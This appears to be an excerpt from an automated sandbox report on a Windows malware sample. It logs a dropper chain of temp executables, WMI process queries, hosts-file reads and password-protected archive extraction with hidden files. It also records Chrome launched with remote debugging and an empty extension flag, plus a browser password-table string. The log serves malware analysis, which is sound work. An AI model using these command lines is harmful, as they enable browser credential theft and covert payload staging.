Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: cd2469328d.exe, 0000000B.00000003.2613673604.0000000003567000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614353900.0000000003535000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2692078477.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3569003818.00000000060F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3576461028.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3810485842.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669476568.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3663084354.00000000054E4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	ReversingLabs: Detection: 57%
Source: file.exe	Virustotal: Detection: 59%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"
Source: unknown	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Process created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
